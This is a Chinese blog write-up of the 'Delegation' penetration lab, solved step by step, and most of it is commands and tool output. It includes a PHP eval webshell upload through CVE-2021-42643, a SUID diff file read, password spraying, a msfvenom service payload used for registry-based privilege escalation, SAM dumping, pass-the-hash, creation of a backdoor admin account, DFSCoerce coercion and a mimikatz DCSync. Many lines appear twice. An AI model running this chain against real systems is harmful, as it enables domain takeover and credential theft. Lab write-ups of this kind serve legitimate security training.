文章导读

春秋云镜-Delegation

zzdzz 2025年12月3日 150

参考文章

https://blog.csdn.net/uuzeray/article/details/141792817
https://blog.csdn.net/weixin_63576152/article/details/133828891
https://fushuling.com/index.php/2023/09/24/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7delegation/

https://blog.csdn.net/uuzeray/article/details/141792817
https://blog.csdn.net/weixin_63576152/article/details/133828891
https://fushuling.com/index.php/2023/09/24/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7delegation/

入口机

39.99.155.135

fscan扫结果

PS G:\tool\护网\工具打包> G:\tool\护网\工具打包\fscan322.exe -h 39.99.155.135

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.155.135:22 open
39.99.155.135:21 open
39.99.155.135:80 open
39.99.155.135:3306 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.155.135      code:200 len:68108  title:中文网页标题

PS G:\tool\护网\工具打包> G:\tool\护网\工具打包\fscan322.exe -h 39.99.155.135

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.155.135:22 open
39.99.155.135:21 open
39.99.155.135:80 open
39.99.155.135:3306 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.155.135      code:200 len:68108  title:中文网页标题

dirsearch扫到后台登录

环境好像有点问题，重启可以了

弱口令登录后台

admin/123456

admin/123456

存在漏洞cve-2021-42643

url

http://39.99.226.251/index.php?case=template&act=save&admin_dir=admin&site=default

http://39.99.226.251/index.php?case=template&act=save&admin_dir=admin&site=default

body

sid=#data_d_.._d_.._d_.._d_1.php&slen=693&scontent=<?php @eval($_POST[1]);?>

sid=#data_d_.._d_.._d_.._d_1.php&slen=693&scontent=<?php @eval($_POST[1]);?>

返回ok即上传成功

vshell上线一下，权限不足，尝试提权

find / -user root -perm -4000 -print 2>/dev/null

find / -user root -perm -4000 -print 2>/dev/null

diff提权

diff --line-format=%L /dev/null /home/flag/flag01.txt

diff --line-format=%L /dev/null /home/flag/flag01.txt

拿到flag01

flag01: flag{8920753c-b987-4017-997f-9589f88ac237}

flag01: flag{8920753c-b987-4017-997f-9589f88ac237}

得到提示

Here is the hint: WIN19\Adrian

Here is the hint: WIN19\Adrian

开始老三样

传fscan，扫内网，搭隧道

www-data@localhost:/tmp$ ./fscan -h 172.22.4.36/24 -o 1.txt

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.4.7      is alive
(icmp) Target 172.22.4.19     is alive
(icmp) Target 172.22.4.36     is alive
(icmp) Target 172.22.4.45     is alive
[*] Icmp alive hosts len is: 4
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:21 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:139 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo 
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetBios 172.22.4.45     XIAORANG\WIN19                
[*] OsInfo 172.22.4.7   (Windows Server 2016 Datacenter 14393)
[*] NetInfo 
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetInfo 
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] NetBios 172.22.4.7      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393
[*] WebTitle http://172.22.4.36        code:200 len:68100  title:中文网页标题
[*] WebTitle http://172.22.4.45        code:200 len:703    title:IIS Windows Server

www-data@localhost:/tmp$ ./fscan -h 172.22.4.36/24 -o 1.txt

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.4.7      is alive
(icmp) Target 172.22.4.19     is alive
(icmp) Target 172.22.4.36     is alive
(icmp) Target 172.22.4.45     is alive
[*] Icmp alive hosts len is: 4
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:21 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:139 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo 
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetBios 172.22.4.45     XIAORANG\WIN19                
[*] OsInfo 172.22.4.7   (Windows Server 2016 Datacenter 14393)
[*] NetInfo 
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetInfo 
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] NetBios 172.22.4.7      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393
[*] WebTitle http://172.22.4.36        code:200 len:68100  title:中文网页标题
[*] WebTitle http://172.22.4.45        code:200 len:703    title:IIS Windows Server

根据提示下一个目标应该是172.22.4.45

开了3389，应该就是要爆破密码

proxychains4 crackmapexec smb 172.22.4.45 -u Adrian -p rockyou.txt -d WIN19

proxychains4 crackmapexec smb 172.22.4.45 -u Adrian -p rockyou.txt -d WIN19

SMB         172.22.4.45     445    WIN19            [-] WIN19\Adrian:babygirl1 STATUS_PASSWORD_EXPIRED

SMB         172.22.4.45     445    WIN19            [-] WIN19\Adrian:babygirl1 STATUS_PASSWORD_EXPIRED

登录会直接提示让你更改密码qwer1234@

进去后发现没有权限

win提权

但是桌面有提示

比较关键的就是有个html提到用户可以任意修改服务的注册表

找到一个风险文件，大意是可以对 gupdate 服务的注册表项进行广泛的修改，包括更改配置、删除和创建新的配置项等

首先用msfvenom生成执行马

msfvenom -p windows/x64/exec cmd='C:\windows\system32\cmd.exe /c C:\users\Adrian\Desktop\sam.bat ' --platform windows -f exe-service > a.exe

msfvenom -p windows/x64/exec cmd='C:\windows\system32\cmd.exe /c C:\users\Adrian\Desktop\sam.bat ' --platform windows -f exe-service > a.exe

然后写一个sam.bat，内容如下然后传到win机器上：

reg save hklm\system C:\Users\Adrian\Desktop\system
reg save hklm\sam C:\Users\Adrian\Desktop\sam
reg save hklm\security C:\Users\Adrian\Desktop\security

reg save hklm\system C:\Users\Adrian\Desktop\system
reg save hklm\sam C:\Users\Adrian\Desktop\sam
reg save hklm\security C:\Users\Adrian\Desktop\security

首先修改注册表服务

reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\a.exe" /f

reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\a.exe" /f

接着在cmd启动服务

sc start gupdate

sc start gupdate

桌面会出现三个文件，我们传到kali用secretsdump解一下

secretsdump.py LOCAL -system system -sam sam -security security

secretsdump.py LOCAL -system system -sam sam -security security

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:a0d624af1748e5a38b934b841a00f798

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:a0d624af1748e5a38b934b841a00f798

接下来用admin的哈希打哈希传递拿shell

proxychains psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk

proxychains psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk

flag02

flag02: flag{2cf8a94a-2194-46fd-911e-b77173dfc242}

flag02: flag{2cf8a94a-2194-46fd-911e-b77173dfc242}

可以方便起见，创一个admin用户

net user zzdzz qwer1234@ /add
net localgroup administrators zzdzz /add

net user zzdzz qwer1234@ /add
net localgroup administrators zzdzz /add

获得域控哈希

proxychains bloodhound-python -u win19$ --hashes "aad3b435b51404eeaad3b435b51404ee:a0d624af1748e5a38b934b841a00f798" -d xiaorang.lab -dc dc01.xiaorang.lab -c all --dns-tcp -ns 172.22.4.7 --auth-method ntlm --zip

proxychains bloodhound-python -u win19$ --hashes "aad3b435b51404eeaad3b435b51404ee:a0d624af1748e5a38b934b841a00f798" -d xiaorang.lab -dc dc01.xiaorang.lab -c all --dns-tcp -ns 172.22.4.7 --auth-method ntlm --zip

后面是要打WIN19 + DC01的非约束委派，参考红队域渗透NTLM Relay：强制认证方式总结，用DFSCoerce拿域控

首先用新创的admin账号登录win，然后用管理员权限运行Rubeus

使用 DFSCoerce 漏洞利用工具，触发辅域控进行强制验证

https://github.com/Wh04m1001/DFSCoerce

proxychains python3 dfscoerce.py -u win19$ -hashes "aad3b435b51404eeaad3b435b51404ee:a0d624af1748e5a38b934b841a00f798" -d xiaorang.lab win19 172.22.4.7

proxychains python3 dfscoerce.py -u win19$ -hashes "aad3b435b51404eeaad3b435b51404ee:a0d624af1748e5a38b934b841a00f798" -d xiaorang.lab win19 172.22.4.7

可以看到我们获得base64之后的tgt票据了，本地解base64之后直接保存为DC01.kirbi

echo 'doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6NzUbFzvS6GDmmjptoTeLk227VKJtbm8iM2OssA8hx1tfTIi3L3sKxOKXWEDw0jhyHMKTRJj6gv+mI75IYtS4OyrY6fQfsTZIh9gFmPnMGeTni7Tm5ZdTIjVwmnwbTtXfKyjdkaAEHMfaDEY3O2L1z8XZNZLbEYHUN6fNpvJF4kr8KtUpk3QE/2NEtWILzAUQRjCnTh3GoYYQ7xI/vdvKArITTQgaN09l8Onk92fdA9ZqXiO8YR60uS9+oQNz1fg7Ns064f5WgdknLyJglPn/JENsUgqPGB9F7395TKYiXN4N8K/oYPG0liUYBzmByOlmuFjlUtY0VzJAol11hS9Bzfk6w0+DoLwC4wFqTxPggvFsvQ+27o5rt/hCFDM+yM7fSVi/BPDQtelRVh1UuKeNqSwXSyGTSaKMKzpZ7EIe5FETY7at2kwyLPFm3LExDvxWIngIhAFsqG1quE85B8LSTnzCE+Yvk1soY5zkhi/0xD7Akkj8wBqR/7MKQIGx24fLr69g/nBPBRpPQUeywEz3+IGa0hjNi8+Q8G94xzZeWzbXdwdpYx9ISAco98/X4ST8rebk+RE0owHGqIFXSKFWlH6kT6oUtVuMXaCSaZ20JE9Mbm3iJJgu8wxSI1YpKCvVHkzq3qmFKqg4zqPTN1krXmqxJX1LEo3oicR4mugRKbW8Oklnq7Zz2r5nwII7LR+FGcFVymWtsnSxI75nSUgOoct6NG4AUvcYBkd+bOLIPZr5ats0arr5bXVGM039ILNkTGM0qg78vd3ohhi3Q9RiFsVtiTgdxk+ki+3QhVidg2QS+mN1J6gXALxAG4a51D1c4nq0IlpNB6vvC6BWP5CQA5SCem9YJR8AI2V2HDjbNm4PJhNd2mMsFm/3n7j8QAZo91FIQcblPNBiFdgJa8qoueNWD2KYMND/d2bBEJwJwJhHGapF3sssXIdiSfNjuKyq4cKCLe1nu3UZts+fMI0ZqajrjuoywjfrHa9ST/cxwsmBxYt6K909+Y86XhaEngFMYCMnR0UtO47sUCaM9Q4imue0Sz30vbTV6AxIZ5J14hfh2L8e0yyBVNrM0vakW4wiO/VRbr70xwW3QENDtghpuA9vKB3m7Iy6s2xl1K2OyUdZUiOuo1Jq5NtyXUZXLFIPM3ykQ++MNYvEcm495SvJFM8glsokgzr69+bXyPLjg4jAKcbmhSmDgff32uoGeTApJ3oDCqZwwGRb80+fXxIETj0fFlmioHaoylld6qZp/hDD0KniK84Uk464WBpVIw8n4roscn8FxZr9b/k7azO4AazuJYtyKTrCp7QB2QfmBER2M6LNtIzzSndiZL9wJPgl87B1aWZj7G49VafHOmkRmeannAwyEmyXYZwR9PmCLVJO84xBCSTbnx7O8EggYmSHIZKWGHE/jq1sS1l0xTAvdBXhHgvrTO2D2joOdTB+jgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCCUOndjz8eZXqUhq6SnrOz+ulJ875dy6f1GiArW34YNx6EOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MTEwMTEyMjk0N1qmERgPMjAyNTExMDEyMjI5NDdapxEYDzIwMjUxMTA4MTIyOTQ3WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==' | base64 -d > DC01.kirbi

echo 'doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6NzUbFzvS6GDmmjptoTeLk227VKJtbm8iM2OssA8hx1tfTIi3L3sKxOKXWEDw0jhyHMKTRJj6gv+mI75IYtS4OyrY6fQfsTZIh9gFmPnMGeTni7Tm5ZdTIjVwmnwbTtXfKyjdkaAEHMfaDEY3O2L1z8XZNZLbEYHUN6fNpvJF4kr8KtUpk3QE/2NEtWILzAUQRjCnTh3GoYYQ7xI/vdvKArITTQgaN09l8Onk92fdA9ZqXiO8YR60uS9+oQNz1fg7Ns064f5WgdknLyJglPn/JENsUgqPGB9F7395TKYiXN4N8K/oYPG0liUYBzmByOlmuFjlUtY0VzJAol11hS9Bzfk6w0+DoLwC4wFqTxPggvFsvQ+27o5rt/hCFDM+yM7fSVi/BPDQtelRVh1UuKeNqSwXSyGTSaKMKzpZ7EIe5FETY7at2kwyLPFm3LExDvxWIngIhAFsqG1quE85B8LSTnzCE+Yvk1soY5zkhi/0xD7Akkj8wBqR/7MKQIGx24fLr69g/nBPBRpPQUeywEz3+IGa0hjNi8+Q8G94xzZeWzbXdwdpYx9ISAco98/X4ST8rebk+RE0owHGqIFXSKFWlH6kT6oUtVuMXaCSaZ20JE9Mbm3iJJgu8wxSI1YpKCvVHkzq3qmFKqg4zqPTN1krXmqxJX1LEo3oicR4mugRKbW8Oklnq7Zz2r5nwII7LR+FGcFVymWtsnSxI75nSUgOoct6NG4AUvcYBkd+bOLIPZr5ats0arr5bXVGM039ILNkTGM0qg78vd3ohhi3Q9RiFsVtiTgdxk+ki+3QhVidg2QS+mN1J6gXALxAG4a51D1c4nq0IlpNB6vvC6BWP5CQA5SCem9YJR8AI2V2HDjbNm4PJhNd2mMsFm/3n7j8QAZo91FIQcblPNBiFdgJa8qoueNWD2KYMND/d2bBEJwJwJhHGapF3sssXIdiSfNjuKyq4cKCLe1nu3UZts+fMI0ZqajrjuoywjfrHa9ST/cxwsmBxYt6K909+Y86XhaEngFMYCMnR0UtO47sUCaM9Q4imue0Sz30vbTV6AxIZ5J14hfh2L8e0yyBVNrM0vakW4wiO/VRbr70xwW3QENDtghpuA9vKB3m7Iy6s2xl1K2OyUdZUiOuo1Jq5NtyXUZXLFIPM3ykQ++MNYvEcm495SvJFM8glsokgzr69+bXyPLjg4jAKcbmhSmDgff32uoGeTApJ3oDCqZwwGRb80+fXxIETj0fFlmioHaoylld6qZp/hDD0KniK84Uk464WBpVIw8n4roscn8FxZr9b/k7azO4AazuJYtyKTrCp7QB2QfmBER2M6LNtIzzSndiZL9wJPgl87B1aWZj7G49VafHOmkRmeannAwyEmyXYZwR9PmCLVJO84xBCSTbnx7O8EggYmSHIZKWGHE/jq1sS1l0xTAvdBXhHgvrTO2D2joOdTB+jgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCCUOndjz8eZXqUhq6SnrOz+ulJ875dy6f1GiArW34YNx6EOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MTEwMTEyMjk0N1qmERgPMjAyNTExMDEyMjI5NDdapxEYDzIwMjUxMTA4MTIyOTQ3WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==' | base64 -d > DC01.kirbi

然后传一个mimikatz上去，用DCSync功能获得域控哈希：

mimikatz.exe "kerberos::purge" "kerberos::ptt DC01.kirbi" "lsadump::dcsync /domain:xiaorang.lab /user:administrator" "exit"

mimikatz.exe "kerberos::purge" "kerberos::ptt DC01.kirbi" "lsadump::dcsync /domain:xiaorang.lab /user:administrator" "exit"

横传剩余机器

获得域控哈希，最后横传一下域内还没打下的机器即可

proxychains ./psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.19

proxychains ./psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.19

type C:\users\administrator\flag\flag03.txt

type C:\users\administrator\flag\flag03.txt

flag03

flag03: flag{8f996e05-dd76-4a8b-90d8-345b118d4093}

flag03: flag{8f996e05-dd76-4a8b-90d8-345b118d4093}

proxychains ./psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.7

proxychains ./psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.7

type C:\users\administrator\flag\flag04.txt

type C:\users\administrator\flag\flag04.txt

flag04

flag04: flag{a48690f7-911c-487a-998b-e1cc40b70a1f}

flag04: flag{a48690f7-911c-487a-998b-e1cc40b70a1f}

评论（已关闭）

评论已关闭

Hello! 欢迎来到zz的小站！

加载中